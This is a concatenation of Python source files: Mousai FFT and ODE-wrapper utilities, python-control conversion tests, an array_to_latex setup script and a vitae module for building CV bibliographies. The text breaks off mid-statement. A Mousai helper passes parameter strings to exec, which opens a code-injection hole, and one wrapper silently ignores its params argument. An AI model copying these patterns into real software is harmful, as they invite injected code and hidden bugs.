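# harmonic balance solution from the docstring example to 300 evenly spaced
# points per cycle.
def _demo_time_history():
    x = np.array([[-0.34996499, 1.36053998, -1.11828552]])
    t = np.array([0., 2.991993, 5.98398601])
    t_full, x_full = time_history(t, x, num_time_points=300)
    return t_full.shape, x_full.shape  # (300,) and (1, 300)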
def condense_fft(X_full, num_harmonics):
"""Create equivalent amplitude reduced-size FFT from longer FFT."""
X_red = (np.hstack((X_full[:, 0:(num_harmonics + 1)],
X_full[:, -1:-(num_harmonics + 1):-1]))
* (2 * num_harmonics + 1) / X_full[0, :].size)
return X_red
def condense_rfft(X_full, num_harmonics):
"""Return real fft with fewer harmonics."""
X_len = X_full.shape[1]
X_red = X_full[:, :(num_harmonics) * 2 + 1] / \
X_len * (1 + 2 * num_harmonics)
return X_red
def expand_rfft(X, num_harmonics):
"""Return real fft with mor harmonics."""
X_len = X.shape[1]
cur_num_harmonics = (X_len - 1) / 2
X_expanded = np.hstack((X / X_len * (1 + 2 * num_harmonics),
np.zeros((X.shape[0],
int(2 * (num_harmonics
- cur_num_harmonics))))
))
return X_expanded
def rfft_to_fft(X_real):
"""Switch from SciPy real fft form to complex fft form."""
X = fftp.fft(fftp.irfft(X_real))
return X
def fft_to_rfft(X):
"""Switch from complex form fft form to SciPy rfft form."""
X_real = fftp.rfft(np.real(fftp.ifft(X)))
return X_real
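# Shape sketch (added for illustration): a real signal with 5 harmonics has a
# real fft of width 1 + 2*5 = 11; condensing to 2 harmonics keeps 5 columns,
# while expanding to 8 harmonics zero-pads out to 1 + 2*8 = 17 columns.
def _demo_condense_expand():
    X = fftp.rfft(np.random.randn(1, 11))
    return condense_rfft(X, 2).shape, expand_rfft(X, 8).shape  # (1, 5), (1, 17)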
def time_history_r(t, x, num_time_points=200, realify=True):
r"""Generate refined time history from harmonic balance solution.
Harmonic balance solutions presume a limited number of harmonics in the
solution. The result is that the time history is usually a very limited
number of values. Plotting these results implies that the solution isn't
actually a continuous one. This function fills in the gaps using the
harmonics obtained in the solution.
Parameters
----------
t: array_like
1 x m array where m is the number of
values representing the repeating solution.
x: array_like
        n x m array where n is the number of equations and m is the number of
values representing the repeating solution.
realify: boolean
Force the returned results to be real.
num_time_points: int
number of points desired in the "smooth" time history.
Returns
-------
t: array_like
1 x num_time_points array.
x: array_like
n x num_time_points array.
Examples
--------
>>> import numpy as np
>>> import mousai as ms
>>> x = np.array([[-0.34996499, 1.36053998, -1.11828552]])
>>> t = np.array([0. , 2.991993 , 5.98398601])
>>> t_full, x_full = ms.time_history(t, x, num_time_points=300)
Notes
-----
The implication of this function is that the higher harmonics that
were not determined in the solution are zero. This is indeed the assumption
made when setting up the harmonic balance solution. Whether this is a valid
assumption is something that the user must judge when obtaining the
solution.
"""
dt = t[1]
t_length = t.size
t = np.linspace(0, t_length * dt, num_time_points, endpoint=False)
x_freq = fftp.fft(x)
x_zeros = np.zeros((x.shape[0], t.size - x.shape[1]))
x_freq = np.insert(x_freq, [t_length - t_length // 2], x_zeros, axis=1)
# print(x_freq)
# x_freq = np.hstack((x_freq, x_zeros))
# print(x_freq)
x = fftp.ifft(x_freq) * num_time_points / t_length
if realify is True:
x = np.real(x)
else:
print('x was real')
return t, x
def function_to_mousai(sdfunc):
"""Convert scipy.integrate functions to Mousai form.
The form of the function returning state derivatives is
`sdfunc(x, t, params)` where `x` are the current states as an `n` by `1`
array, `t` is a scalar, and `params` is a dictionary of parameters, one of
which must be `omega`. This is inconsistent with the SciPy numerical
    integrators for good cause, but can make simultaneous usage difficult.
This function returns a function compatible with Mousai by using the
inspect package to determine the form of the function being used and to
wrap it in Mousai form.
Parameters
----------
sdfunc : function
function in SciPy integrator form (`odeint`_ or `solve_ivp`_)
Returns
-------
new_function : function
function in Mousai form (accepting inputs like a standard Mousai
function)
Notes
-----
.. seealso::
* ``old_mousai_to_new_mousai``
* ``mousai_to_odeint``
* ``mousai_to_solve_ivp``
.. _`odeint` : https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.ode.html#scipy.integrate.ode
.. _`solve_ivp` : https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.solve_ivp.html#scipy.integrate.solve_ivp
"""
sig = inspect.signature(sdfunc)
call_parameters = list(sig.parameters.keys())
if len(call_parameters) == 2:
if call_parameters[0] == 't' or call_parameters[0] == 'time':
# t and x must be swapped, params available in over-scope
def newfunction(x, t, params={}):
for k, v in params.items():
exec("%s = %s" % (k, v))
return sdfunc(t, x)
else: # params available in overscope
def newfunction(x, t, params={}):
for k, v in params.items():
exec("%s = %s" % (k, v))
return sdfunc(x, t)
else:
if call_parameters[0] == 't' or call_parameters[0] == 'time':
# t and x must be swapped, params available in over-scope
def newfunction(x, t, params={}):
other_params = [params[x] for x in call_parameters]
return sdfunc(t, x, *other_params)
else: # params available in overscope
def newfunction(x, t, params={}):
other_params = [params[x] for x in call_parameters]
return sdfunc(x, t, *other_params)
return newfunction
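# Usage sketch (added for illustration; `pend` is a hypothetical
# solve_ivp-style derivative function): wrap a (t, y) function into Mousai's
# (x, t, params) calling convention.
def _demo_function_to_mousai():
    def pend(t, y):
        return np.array([[y[1]], [-np.sin(y[0])]])
    sdfunc = function_to_mousai(pend)
    return sdfunc(np.array([0.1, 0.0]), 0.0)  # same as pend(0.0, y)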
def old_mousai_to_new_mousai(function):
"""Return derivative function converted to new Mousai format.
The original format for the Mousai derivative function was
`sdfunc(x, params)`. This is inconsistent with the SciPy integration
functions. To act more as expected, the standard from 0.4.0 on will take
the form `sdfunc(x, t, params)`.
Parameters
----------
sdfunc : function
function in old Mousai form. `sdfunc(y, params)`
Returns
-------
new_sdfunc : function
function in new Mousai form. `sdfunc(y, t, params)`
Notes
-----
.. seealso::
* ``function_to_mousai``
* ``mousai_to_odeint``
* ``mousai_to_solve_ivp``
"""
def new_sdfunc(x, t, params):
params['cur_time'] = t
return function(x, params)
return new_sdfunc
def mousai_to_solve_ivp(sdfunc, params):
"""Return function callable from solve_ivp given Mousai sdfunc.
Parameters
----------
sdfunc : function
Mousai-style function returning state derivatives.
params : dictionary
dictionary of parameters used by `sdfunc`.
Returns
-------
solve_ivp_function : function
function ordered to work with `solve_ivp`_
Notes
-----
The ability to pass parameters was deprecated in the new SciPy integrators:
`https://stackoverflow.com/questions/48245765/pass-args-for-solve-ivp-new-scipy-ode-api`
`https://github.com/scipy/scipy/issues/8352`
.. seealso::
* ``function_to_mousai``
* ``old_mousai_to_new_mousai``
* ``mousai_to_odeint``
"""
sig = inspect.signature(sdfunc)
call_parameters = list(sig.parameters.keys())
if len(call_parameters) == 2:
sdfunc = old_mousai_to_new_mousai(sdfunc)
print("""Warning. The two-argument form of Mousai derivsative functions
is deprecated.""")
def solve_ivp_function(t, y):
return sdfunc(y, t, params)
return solve_ivp_function
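# Usage sketch (added for illustration; `decay` and `k` are hypothetical):
# adapt a Mousai-style derivative function for scipy.integrate.solve_ivp,
# which expects the (t, y) argument order.
def _demo_mousai_to_solve_ivp():
    from scipy.integrate import solve_ivp
    def decay(x, t, params):
        return -params['k'] * x
    f = mousai_to_solve_ivp(decay, {'k': 2.0})
    return solve_ivp(f, (0.0, 1.0), [1.0])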
def mousai_to_odeint(sdfunc, params):
"""Return function callable from solve_ivp given Mousai a sdfunc.
Parameters
----------
sdfunc : function
Mousai-style function returning state derivatives.
params : dictionary
dictionary of parameters used by `sdfunc`.
Returns
-------
odeint_function : function
function ordered to work with `odeint`_
Notes
-----
.. seealso::
* ``function_to_mousai``
* ``old_mousai_to_new_mousai``
* ``mousai_to_solve_ivp``
"""
sig = inspect.signature(sdfunc)
call_parameters = list(sig.parameters.keys())
if len(call_parameters) == 2:
sdfunc = old_mousai_to_new_mousai(sdfunc)
print("""Warning. The two-argument form of Mousai derivative โ โ \
functions is deprecated.""")
if 'sdfunc_params' not in globals():
print("Define your parameters in the user created `sdfunc_params`",
"dictionary.")
sdfunc_params = {}
def odeint_function(y, t):
return sdfunc(y, t, params=sdfunc_params)
return odeint_function
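# Usage sketch (added for illustration; `decay` and `k` are hypothetical, and
# this assumes the `params` argument is honored as documented): the odeint
# wrapper is the same idea with the (y, t) argument order that
# scipy.integrate.odeint expects.
def _demo_mousai_to_odeint():
    from scipy.integrate import odeint
    def decay(x, t, params):
        return -params['k'] * x
    f = mousai_to_odeint(decay, {'k': 2.0})
    return odeint(f, [1.0], np.linspace(0.0, 1.0, 11))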
``` |
{
"source": "josephcslater/python-control",
"score": 3
} |
#### File: control/tests/convert_test.py
```python
from __future__ import print_function
from warnings import warn
import numpy as np
import pytest
from control import rss, ss, ss2tf, tf, tf2ss
from control.statesp import _mimo2siso
from control.statefbk import ctrb, obsv
from control.freqplot import bode
from control.exception import slycot_check
from control.tests.conftest import slycotonly
# Set to True to print systems to the output.
verbose = False
# Maximum number of states to test + 1
maxStates = 4
# Maximum number of inputs and outputs to test + 1
# If slycot is not installed, just check SISO
maxIO = 5 if slycot_check() else 2
@pytest.fixture(scope='module')
def fixedseed():
"""Get consistent results"""
np.random.seed(7)
class TestConvert:
"""Test state space and transfer function conversions."""
def printSys(self, sys, ind):
"""Print system to the standard output."""
print("sys%i:\n" % ind)
print(sys)
@pytest.mark.parametrize("states", range(1, maxStates))
@pytest.mark.parametrize("inputs", range(1, maxIO))
@pytest.mark.parametrize("outputs", range(1, maxIO))
def testConvert(self, fixedseed, states, inputs, outputs):
"""Test state space to transfer function conversion.
start with a random SS system and transform to TF then
back to SS, check that the matrices are the same.
"""
ssOriginal = rss(states, outputs, inputs)
if verbose:
self.printSys(ssOriginal, 1)
# Make sure the system is not degenerate
Cmat = ctrb(ssOriginal.A, ssOriginal.B)
if (np.linalg.matrix_rank(Cmat) != states):
pytest.skip("not reachable")
Omat = obsv(ssOriginal.A, ssOriginal.C)
if (np.linalg.matrix_rank(Omat) != states):
pytest.skip("not observable")
tfOriginal = tf(ssOriginal)
if (verbose):
self.printSys(tfOriginal, 2)
ssTransformed = ss(tfOriginal)
if (verbose):
self.printSys(ssTransformed, 3)
tfTransformed = tf(ssTransformed)
if (verbose):
self.printSys(tfTransformed, 4)
# Check to see if the state space systems have same dim
if (ssOriginal.nstates != ssTransformed.nstates) and verbose:
print("WARNING: state space dimension mismatch: %d versus %d" %
(ssOriginal.nstates, ssTransformed.nstates))
# Now make sure the frequency responses match
# Since bode() only handles SISO, go through each I/O pair
# For phase, take sine and cosine to avoid +/- 360 offset
for inputNum in range(inputs):
for outputNum in range(outputs):
if (verbose):
print("Checking input %d, output %d"
% (inputNum, outputNum))
ssorig_mag, ssorig_phase, ssorig_omega = \
bode(_mimo2siso(ssOriginal, inputNum, outputNum),
deg=False, plot=False)
ssorig_real = ssorig_mag * np.cos(ssorig_phase)
ssorig_imag = ssorig_mag * np.sin(ssorig_phase)
#
# Make sure TF has same frequency response
#
num = tfOriginal.num[outputNum][inputNum]
den = tfOriginal.den[outputNum][inputNum]
tforig = tf(num, den)
tforig_mag, tforig_phase, tforig_omega = \
bode(tforig, ssorig_omega,
deg=False, plot=False)
tforig_real = tforig_mag * np.cos(tforig_phase)
tforig_imag = tforig_mag * np.sin(tforig_phase)
np.testing.assert_array_almost_equal(
ssorig_real, tforig_real)
np.testing.assert_array_almost_equal(
ssorig_imag, tforig_imag)
#
# Make sure xform'd SS has same frequency response
#
ssxfrm_mag, ssxfrm_phase, ssxfrm_omega = \
bode(_mimo2siso(ssTransformed,
inputNum, outputNum),
ssorig_omega,
deg=False, plot=False)
ssxfrm_real = ssxfrm_mag * np.cos(ssxfrm_phase)
ssxfrm_imag = ssxfrm_mag * np.sin(ssxfrm_phase)
np.testing.assert_array_almost_equal(
ssorig_real, ssxfrm_real, decimal=5)
np.testing.assert_array_almost_equal(
ssorig_imag, ssxfrm_imag, decimal=5)
# Make sure xform'd TF has same frequency response
#
num = tfTransformed.num[outputNum][inputNum]
den = tfTransformed.den[outputNum][inputNum]
tfxfrm = tf(num, den)
tfxfrm_mag, tfxfrm_phase, tfxfrm_omega = \
bode(tfxfrm, ssorig_omega,
deg=False, plot=False)
tfxfrm_real = tfxfrm_mag * np.cos(tfxfrm_phase)
tfxfrm_imag = tfxfrm_mag * np.sin(tfxfrm_phase)
np.testing.assert_array_almost_equal(
ssorig_real, tfxfrm_real, decimal=5)
np.testing.assert_array_almost_equal(
ssorig_imag, tfxfrm_imag, decimal=5)
def testConvertMIMO(self):
"""Test state space to transfer function conversion.
Do a MIMO conversion and make sure that it is processed
correctly both with and without slycot
Example from issue gh-120, jgoppert
"""
# Set up a 1x3 transfer function (should always work)
tsys = tf([[[-235, 1.146e4],
[-235, 1.146E4],
[-235, 1.146E4, 0]]],
[[[1, 48.78, 0],
[1, 48.78, 0, 0],
[0.008, 1.39, 48.78]]])
# Convert to state space and look for an error
if (not slycot_check()):
with pytest.raises(TypeError):
tf2ss(tsys)
else:
ssys = tf2ss(tsys)
assert ssys.B.shape[1] == 3
assert ssys.C.shape[0] == 1
def testTf2ssStaticSiso(self):
"""Regression: tf2ss for SISO static gain"""
gsiso = tf2ss(tf(23, 46))
assert 0 == gsiso.nstates
assert 1 == gsiso.ninputs
assert 1 == gsiso.noutputs
# in all cases ratios are exactly representable, so assert_array_equal
# is fine
np.testing.assert_array_equal([[0.5]], gsiso.D)
def testTf2ssStaticMimo(self):
"""Regression: tf2ss for MIMO static gain"""
# 2x3 TFM
gmimo = tf2ss(tf(
[[ [23], [3], [5] ], [ [-1], [0.125], [101.3] ]],
[[ [46], [0.1], [80] ], [ [2], [-0.1], [1] ]]))
assert 0 == gmimo.nstates
assert 3 == gmimo.ninputs
assert 2 == gmimo.noutputs
d = np.array([[0.5, 30, 0.0625], [-0.5, -1.25, 101.3]])
np.testing.assert_array_equal(d, gmimo.D)
def testSs2tfStaticSiso(self):
"""Regression: ss2tf for SISO static gain"""
gsiso = ss2tf(ss([], [], [], 0.5))
np.testing.assert_array_equal([[[0.5]]], gsiso.num)
np.testing.assert_array_equal([[[1.]]], gsiso.den)
def testSs2tfStaticMimo(self):
"""Regression: ss2tf for MIMO static gain"""
# 2x3 TFM
a = []
b = []
c = []
d = np.array([[0.5, 30, 0.0625], [-0.5, -1.25, 101.3]])
gtf = ss2tf(ss(a, b, c, d))
# we need a 3x2x1 array to compare with gtf.num
numref = d[..., np.newaxis]
np.testing.assert_array_equal(numref,
np.array(gtf.num) / np.array(gtf.den))
@slycotonly
def testTf2SsDuplicatePoles(self):
"""Tests for 'too few poles for MIMO tf gh-111'"""
num = [[[1], [0]],
[[0], [1]]]
den = [[[1, 0], [1]],
[[1], [1, 0]]]
g = tf(num, den)
s = ss(g)
np.testing.assert_array_equal(g.pole(), s.pole())
@slycotonly
def test_tf2ss_robustness(self):
"""Unit test to make sure that tf2ss is working correctly. gh-240"""
num = [ [[0], [1]], [[1], [0]] ]
den1 = [ [[1], [1,1]], [[1,4], [1]] ]
sys1tf = tf(num, den1)
sys1ss = tf2ss(sys1tf)
# slight perturbation
den2 = [ [[1], [1e-10, 1, 1]], [[1,4], [1]] ]
sys2tf = tf(num, den2)
sys2ss = tf2ss(sys2tf)
# Make sure that the poles match for StateSpace and TransferFunction
np.testing.assert_array_almost_equal(np.sort(sys1tf.pole()),
np.sort(sys1ss.pole()))
np.testing.assert_array_almost_equal(np.sort(sys2tf.pole()),
np.sort(sys2ss.pole()))
def test_tf2ss_nonproper(self):
"""Unit tests for non-proper transfer functions"""
# Easy case: input 2 to output 1 is 's'
num = [ [[0], [1, 0]], [[1], [0]] ]
den1 = [ [[1], [1]], [[1,4], [1]] ]
with pytest.raises(ValueError):
tf2ss(tf(num, den1))
# Trickier case (make sure that leading zeros in den are handled)
num = [ [[0], [1, 0]], [[1], [0]] ]
den1 = [ [[1], [0, 1]], [[1,4], [1]] ]
with pytest.raises(ValueError):
tf2ss(tf(num, den1))
``` |
{
"source": "josephcslater/to_latex",
"score": 3
} |
#### File: josephcslater/to_latex/setup.py
```python
from setuptools import setup
import os
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
"""Read the readme.rst file."""
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open('array_to_latex/__init__.py', 'rb') as fid:
for line in fid:
line = line.decode('utf-8')
if line.startswith('__version__'):
version = line.strip().split()[-1][1:-1]
break
setup(name='array_to_latex',
# Note: Version must also be set in __init__.py
# Version must also be set in download_url.
version=version,
description='Return Numpy and Pandas arrays as formatted LaTeX arrays.',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/josephcslater/array_to_latex/',
# download_url='https://github.com/josephcslater
# /array_to_latex/archive/0.42.tar.gz',
packages=['array_to_latex'],
long_description=read('README.rst'),
keywords=['latex', 'array', 'format', 'numpy', 'scipy'],
install_requires=['numpy', 'pandas', 'clipboard'],
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
'Topic :: Text Processing :: Markup :: LaTeX',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Topic :: Utilities']
)
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
``` |
{
"source": "josephcslater/vitae",
"score": 3
} |
#### File: vitae/vitae/vitae.py
```python
import bibtexparser
import tempfile
from bibtexparser.bparser import BibTexParser
from bibtexparser.customization import homogenize_latex_encoding
import os
from pathlib import Path
def makemycv(filename='cv.bib',
silent=True,
bibtex_types=('inbook', 'article', 'periodical',
'techreport', 'inproceedings'),
writeout=True,
indent=' ',
author=None,
outpath=None,
entrytypes=None):
r"""Create sub-bib TeX files for including into CV.abs
Written files with be names `entrytype```.tex`` to the current directory
if `outpath` is not defined. The files `entrytype```.tex`` will overwrite
files with the same name **without warning**.
Parameters
----------
filename : string (optional: default cv.tex)
Name (including optional path) of bib file containing citation entries
bibtex_types : tuple of strings (optional)
List of bibtex bibtex_types to generate \bibentry .tex files for.
Files will be be named `entrytype```.tex``
writeout : boolean (optional: default True)
Write to files. If false, only write to screenself.
indent : string
string of spaces for prettying up the item lists
author : string
select authors whose entries should be included.
outpath : string
output path to write files to.
    silent : boolean (optional: default True)
        if False, print results to the screen
Returns
-------
results : strings
Content(s) of each .tex file generated- in case you want them.
unaccounted : array
Array of bib entries not used in creation of the output.
bibs : array
Full array created by bibtexparser.
https://nwalsh.com/tex/texhelp/bibtx-7.html
Examples
--------
Makes tex files for inclusion in cv.tex (articles.tex, etc.).
    See readme.rst on github.com
>>> import vitae
>>> vitae.makemycv(filename='cv.bib')
Alternatively from a terminal prompt:
> python -c "import vitae; vitae.makemycv(filename='cv.bib')"
"""
if entrytypes is not None:
print('entrytypes will be deprecated in future releases.')
print('Please use bibtex_types')
bibtex_types = entrytypes
if os.path.isfile(filename) is False:
print('{} is not an actual bib file.'.format(filename))
return
if outpath is None:
outpath = ''
if not os.path.isdir(outpath) and outpath != '':
print(outpath, ' is not a valid directory.')
return
parser = BibTexParser()
parser.customization = homogenize_latex_encoding
parser.ignore_nonstandard_types = False
with open(filename) as bibtex_file:
bib_database = bibtexparser.load(bibtex_file, parser)
bibs = bib_database.entries
if author is not None:
bibs = by_author(author, bibs)
results = {}
for entrytype in bibtex_types:
entry = [[bib['year'], bib['ID'], bib['title']]
for bib in bibs if bib['ENTRYTYPE'] == entrytype]
entry_sorted = sorted(entry, key=lambda paper: paper[0], reverse=True)
if silent is False:
if entrytype[-1] == 's':
print('Number of {} is {}'.format(
entrytype, len(entry_sorted)))
else:
print('Number of {}s is {}'.format(
entrytype, len(entry_sorted)))
file_contents = '\\begin{enumerate}\n'
for entry in entry_sorted:
file_contents += indent + '\\item \\bibentry{' + entry[1] + '}\n'
file_contents += '\\end{enumerate}'
if writeout is True:
file = open(os.path.join(outpath, entrytype + '.tex'), 'w')
file.write(file_contents)
file.close()
else:
print(file_contents)
results[entrytype] = file_contents
unaccounted = [bib for bib in bibs if bib['ENTRYTYPE'] not in bibtex_types]
if silent is False:
print('Unaccounted for entries is {}:'.format(len(unaccounted)))
for bib in unaccounted:
print(bib['ID'],
'\n ', bib['year'],
'\n ', bib['ENTRYTYPE'],
'\n ', bib['title'])
return results, unaccounted, bibs
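# Usage sketch (added for illustration; 'cv.bib', 'Doe, J.' and 'tex' are
# hypothetical file, author, and output-directory names): write article.tex,
# inproceedings.tex, etc. for one author into a subdirectory.
def _demo_makemycv():
    return makemycv(filename='cv.bib', author='Doe, J.', outpath='tex')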
def by_author(authorname, bibs):
"""Return only bibs containing authorname."""
keepindex = []
i = 0
an = authorname.replace(" ", "")
authorname = authorname.replace(',', ', ')
authorname = authorname.replace(" ", " ")
authorshort = 'xxxxxxx'
if ',' in authorname and len(an) > (1+an.find(',')):
authorshort = (authorname[:authorname.find(',')]
+ ', '
+ an[an.find(',')+1])
print('number of bibs', len(bibs))
for bib in bibs:
if 'author' in bib:
bibauthor = bib['author']
bibauthor = bibauthor.replace(',', ', ')
bibauthor = bibauthor.replace(' ', ' ')
if authorname in bibauthor:
keepindex.append(i)
i += 1
elif authorshort in bibauthor:
print('Close name WARNING- is bib entry correct?')
print(bib['author'], ': ', bib['title'])
author_bibs = [bibs[i] for i in keepindex]
return author_bibs
def replace_enquote(string):
r"""Replace \enquote with proper quotes."""
front = string[:string.find(r'\enquote{')]
back = string[string.find(r'\enquote{'):].replace('}', "''", 1)
back = back.replace(r'\enquote{', '``')
return front + back
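# Worked example (added for illustration): replace_enquote turns \enquote{...}
# into LaTeX-style quotes, e.g.
# replace_enquote(r"\enquote{My Title}, Journal") -> "``My Title'', Journal"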
def read_bbl(bblfilename):
"""Read bbl file and return dictionary of formatted citations."""
if not is_tool('pdflatex') or not is_tool('bibtex'):
print("Both pdflatex and bibtex must exist on your command",
" line to use this function.")
return
isbibtext = 0
formattedbibs = {}
# print(bibtexparser)
bbl = open(bblfilename, "r")
for line in bbl:
if line[:6] == r'\begin' or line[:4] == r'\end':
pass
elif r'\providecommand' in line:
pass
elif r'bibitem' in line:
bibitem = line[line.find('{')+1: line.find('}')]
isbibtext = 1
bibtext = ''
elif isbibtext == 1:
if len(line) > 2:
bibtext += line.strip('\n')
elif len(line) < 2:
bibtext = replace_enquote(bibtext)
formattedbibs[bibitem] = bibtext
isbibtext = 0
return formattedbibs
def formatted_bibs(bibfile, bibliographystyle='plain'):
"""Make a dictionary of formatted bibs.
Parameters
----------
bibfile : string
full path and file name to the .bib file
bibliographystyle : string (optional)
bst (bib style file) to use. Default: 'plain'
Returns
-------
formattedbibs : dictionary of strings
dictionary of formatted citations with Cite keys as keys.
bibs : array
bibfile array from bibtexparser
"""
# path = os.path.dirname(bibfile)
# bibfilename = os.path.basename(bibfile)
bibliographystyle = bibliographystyle.replace('.bst', '')
old_directory = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdirname:
os.chdir(tmpdirname)
with open('cv_temp.tex', 'w') as template:
# template.write('hello')
template_head = (r"""% !TEX root = cv.tex
\documentclass[12pt, letter]{article}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{bibentry}
\newcommand{\enquote}[1]{``#1''}
\makeatletter\let\saved@bibitem\@bibitem\makeatother
\usepackage[colorlinks=true]{hyperref}
\makeatletter\let\@bibitem\saved@bibitem\makeatother
\usepackage{url}{}
\renewcommand{\cite}{\bibentry}
\begin{document}
\nobibliography{"""
+ bibfile
+ r"""}
\bibliographystyle{"""
+ bibliographystyle
+ r"""}
\pagestyle{plain}
\input{article.tex}
\input{inbook.tex}
\input{inproceedings}
\input{periodical}
\input{techreport}
\end{document}""")
template.write(template_head)
_, _, bibs = makemycv(filename=bibfile, silent=True)
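# Note: this step compiles with lualatex, while the is_tool() guards in
# read_bbl and write_bibs check for pdflatex; a full TeX installation on
# the PATH is assumed either way.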
os.system('lualatex -interaction="batchmode" cv_temp; bibtex cv_temp')
# print(os.path.join(tmpdirname, 'cv_temp.bbl'))
formattedbibs = read_bbl('cv_temp.bbl')
os.chdir(old_directory)  # restore cwd before the temporary directory is removed
return formattedbibs, bibs
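# Hypothetical usage (the path is a placeholder; assumes a TeX toolchain and bibtex on the PATH):
# formattedbibs, bibs = formatted_bibs('/path/to/cv.bib', bibliographystyle='plain')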
def is_tool(name):
"""Check whether `name` is on PATH and marked as executable."""
from shutil import which
return which(name) is not None
def merge_formatted_into_db(formattedbibs, bibfilename=None, bibs=None):
"""Create bib database including formated bibs."""
print('formattedbibs length', len(formattedbibs))
if bibs is None:
if bibfilename is None:
print('No bib file name given.')
return
if not os.path.isfile(bibfilename) or 'bib' not in bibfilename:
print('{} is not an actual bib file.'.format(bibfilename))
return
parser = BibTexParser()
parser.customization = homogenize_latex_encoding
parser.ignore_nonstandard_types = False
with open(bibfilename, encoding='utf-8') as bibtex_file:
bib_database = bibtexparser.load(bibtex_file, parser)
bibs = bib_database.entries
bib_database = [[bib['year'],
bib['ID'],
bib['title'],
bib['ENTRYTYPE'],
formattedbibs[bib['ID']]]
for bib in bibs if bib['ID'] in formattedbibs.keys()]
print('bib_database formatted', len(bib_database))
return bib_database
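# Each row of the returned database has the shape (values illustrative):
# ['2019', 'smith2019', 'A Title', 'article', 'formatted citation text']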
def write_bibs(bibfile=None,
bibliographystyle='plain',
outfile_name=None,
since_year=None,
number_citations=None,
bibtex_types=('article',),
authorname=None,
outputformat=None,
silent=False,
standalone=True,
overwrite=False):
"""Write formatted bibs from bibfile to desired format.
Parameters
----------
bibfile : string
full path and file name to the .bib file
bibliographystyle : string (optional)
bst (bib style file) to use. Default: 'plain'.
outfile_name : string (optional)
name of output file. Default bibfile name with .tex extension. Default
output format is html.
since_year : integer (optional)
year of oldest citation to include. Default: All years.
number_citations : integer (optional)
maximum number of citations to include. Default: all.
bibtex_types : tuple of strings (optional)
types of entries to include. Default: ('article',)
authorname : string (optional)
author whose papers to include. Default: all.
silent : Boolean (optional)
suppress diagnostic output. Default: False (diagnostics are displayed)
standalone : Boolean (optional)
By default, pandoc generates only a fragment. If you want a full
document set this to False. Default: True
overwrite : Boolean (optional)
Overwrite results files? Default: False
Examples
--------
To write citations to an html file:
>>> import vitae
>>> vitae.write_bibs(bibfile = '/Users/jslater/Documents/Resumes/cv.bib',
bibliographystyle='plain',
outfile_name='try.html',
since_year=2008)
Alternatively, from a terminal prompt:
> python -c "import vitae; vitae.write_bibs(bibfile='cv.bib',
bibliographystyle='plain',
outfile_name = 'bibs.html',
since_year=2008)"
"""
if outfile_name is not None and '.bib' in outfile_name:
print('I refuse to write over a bib file. '
+ 'While this software comes with no warranty, '
+ "I'm also not going to knowingly cause you damage. "
+ 'Please choose a more sensible output file name.')
return
if bibfile is None:
print('You must include the input named argument: bibfile')
print('This should include with full name with path.')
print('If the path is not included, cwd will be presumed.')
print('')
print('On Mac or Linux, this looks like:')
print('\'/Users/myusername/Documents/CVs/cv.bib\'')
print('')
print('On Windows, this looks like:')
print('r\'C:\\Users\\myusername\\Documents\\CVs\\cv.bib\'')
print('NOTE: The \'r\' may be necessary on Windows so that '
+ '\'\\\' is not treated as an escape character.')
return
if os.path.isfile(bibfile) is False:
print(bibfile, ' cannot be found at that location.')
print('Please check path and try again.')
return
if (not is_tool('pdflatex')
or not is_tool('bibtex')
or not is_tool('pandoc')):
print("pdflatex, bibtex and pandoc must exist on your command",
" line to use this function.\n")
print("Please see the documentation at:")
print(r"https://github.com/josephcslater/vitae")
return
bibfile = os.path.abspath(bibfile)
path = os.path.dirname(bibfile)
bibfilename = os.path.basename(bibfile)
bibfilenameroot = bibfilename[:-4]
# No output file specified
if outfile_name is None:
outfile_name = bibfilenameroot + '.html'
outfile_name = os.path.join(path, outfile_name)
if os.path.dirname(outfile_name) == '':
path_output = path
else:
path_output = os.path.dirname(outfile_name)
if not os.path.isdir(path_output) and path_output != '':
print('Specified output path:')
print(path_output)
print('is not a valid path. Please try again.')
return
filename_output = os.path.basename(outfile_name)
root_output = filename_output
if '.' in filename_output:
root_output = filename_output[:filename_output.find('.')]
print('Output file root:', root_output)
# Format the bibs. We just format every one in the file, then use what we
# must later.
formattedbibs, bibs = formatted_bibs(bibfile,
bibliographystyle=bibliographystyle)
print('result of formatting bibs', len(formattedbibs))
bibs = merge_formatted_into_db(formattedbibs, bibs=bibs)
# Keep only bibs by chosen author.
if authorname is not None:
bibs = by_author(authorname, bibs)
# At this point, we have a bibs database with just bibs by authorname
# Next steps:
# 3. Truncate non-desired bibtex_types
bibs = [bib for bib in bibs if bib[3] in bibtex_types]
# Sort by date
bibs_sorted = sorted(bibs, key=lambda paper: paper[0], reverse=True)
# 2. Truncate older articles
if since_year is not None:
bibs_truncated = [bib for bib in bibs_sorted
if int(bib[0]) >= since_year]
else:
bibs_truncated = bibs_sorted
# 4. Truncate beyond numberself.
if number_citations is not None and number_citations < len(bibs_truncated):
bibs_final = bibs_truncated[:number_citations]
else:
bibs_final = bibs_truncated
cwd = os.getcwd()
os.chdir(path_output)
outfile_name_tex = root_output + '.tex'
if os.path.isfile(outfile_name_tex) and not overwrite:
os.rename(outfile_name_tex, outfile_name_tex[:-4]+'_old.tex')
# routine to write out bibs_final bibsfinalfilename
with open(outfile_name_tex, 'w') as filename:
for bib in bibs_final:
filename.write(bib[4])
filename.write('\n')
filename.write('\n')
with open(outfile_name_tex) as f:
newText = f.read().replace('{\\em', '\\emph{')
with open(outfile_name_tex, "w") as f:
f.write(newText)
# Store old version of formatted references.
if os.path.isfile(filename_output) and not overwrite:
print('\n\n',
filename_output,
'moved to',
filename_output[:filename_output.find('.')]
+ '_old'
